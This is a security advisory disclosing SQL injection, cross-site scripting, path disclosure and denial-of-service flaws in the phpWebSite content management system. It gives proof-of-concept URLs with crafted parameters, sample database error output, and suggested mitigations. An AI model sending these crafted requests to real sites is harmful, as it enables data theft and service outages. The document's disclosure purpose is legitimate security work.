PRODUCT: phpWebSite
VENDOR: Appalachian State University
VULNERABLE VERSIONS:
- 0.9.x
- 0.8.x
- 0.7.x
- And older versions.
NO VULNERABLE VERSIONS
Description:
phpWebSite provides a complete web site content management system. Web-
based administration allows for easy maintenance of interactive,
community-driven web sites.
SECURITY HOLES FOUND and PROOFS OF CONCEPT: |
---|
I encountered SQL Injection vulnerabilities in some of the phpWebSite
modules , XSS ( Cross Site Scripting ) , Path Disclosures and a Denial
of Service attack.
| SQL |
INJECTION |
---|
I encountered SQL Injection vulnerabilities in the Calendar module ,
active in default configurations , that allows you
to execute SQL queries in the target server with the privileges of the
application user.
When you send a special-crafted command url to the Calendar script you
get a SQL error flag like this:
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
VALUE]0110)) and active=1 [nativecode=1064
** You have an error in your SQL syntax near
'\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
This is an example error flag:
DB Error: syntax error
select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
startDate <= 2003\0-10110) or
(endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
[nativecode=1064
** You have an error in your SQL syntax near
'\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
and endDate ' at line 1]
For get this you must use this simple url:
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&year=2003%00-1&month=
And you get the SQL Error flag. The error occurs when the query
includes the crafted value 2003[%00 = null]-1 .
You can design a successful query for get configuration values or
authentication data.
I desgined an url that makes a successful query ( no hostile query ) :
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
29%20and%20active%3d1
it is ( without url encoding ) :
2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
20071205)) and active=1
It is needed to have a little knowledge of SQL ( in this case , MySQL )
for make a successful attack.
Other scripts of the Calendar module are affected by this hole , when
you send a crafted request like a + symbol at critical url variable
value
you get the "pure" sql server error flag and you can imagine ( i like
this word ) a sql query for view private information of the application
by
looking at the error pages , like an try-error method.
Another urls for probe are:
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=0&year=<
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=1%00&year=)SQL_INJECTION_FAKU
| XSS |
vulnerabilities |
---|
I encountered XSS security holes in some scripts of phpWebSite :
http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
http://[HOST]/[PATH]/index.php?
module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
&MMN_position=[X:X]
http://[HOST]/[PATH]/index.php?
module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
Note that the Calendar & PageMaster & Fatcat modules are affected
COMPLETLY and all the script variables that are passed by url are
affected too by this.
When you access a hostile link with a xss attack in those scripts youur
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can
have more problems…
XSS AT SQL ERRORS:
If you send a crafted url command with a XSS attack code to some of the
scripts that are vulnerable against sql injection vulnerabilities , the
xss attack code will be executed
in the error page.
| PATH |
DISCLOSURES |
---|
I tested this in a Win2K ( Windows 2000 Professional ) with SP3 and
versions:
Sending this:
http://127.0.0.1/index.php?module=calendar&calendar[view]
=month&month=11&year=9 # You can try other things and get the same #
you get this:
Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
Warning: localtime(): invalid local time in
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
<- more than fifty repetitions of this warning ->
It is a strange error , i think that it only occurs in MSWindows
installations.
Possible it occurs when the Pear library TimeZone.php script tries to
convert the localdate in unix time stamp format.
| DENIAL OF |
SERVICE |
---|
There is a DoS/Buffer Overflow Attack in a script inside the Calendar
module that allows you to crash the host running
the MySQL server and the phpWebSite scripts ( must be the same
computer ).
This is a basic proof of concept for this vulnerability :
http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
[VIEW FORM]&month=11&year=91+92+93…( more than 4000 bytes )
An attack like this causes a system global crash including the server
service and the mysql service.
SoLuTiOnS |
---|
1.- Be sure that the user of the phpWebSite database has only SELECT ,
INSERT and UPDATE privileges in only the phpWebSite
database.
2.- Use the php function eregi_replace for prevent XSS attacks.
3.- Turn php_error_flags to Off .
4.- Use in addition an external module if you are using apache like
mod_security .
5.- If you are paranoic don't use PHP , MySQL , Windows , Linux ,
computers , tcp/ip , netbios , games , asp ,
Apache… nothing !
WARNING ;-) : ( paranoic solution… )
CONTACT |
---|
Lorenzo Hernandez Garcia-Hierro
— Computer Security Analyzer —
–Nova Projects Professional Coding–
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
www.novappc.com
security.novappc.com
www.lorenzohgh.com
NSRG-20-7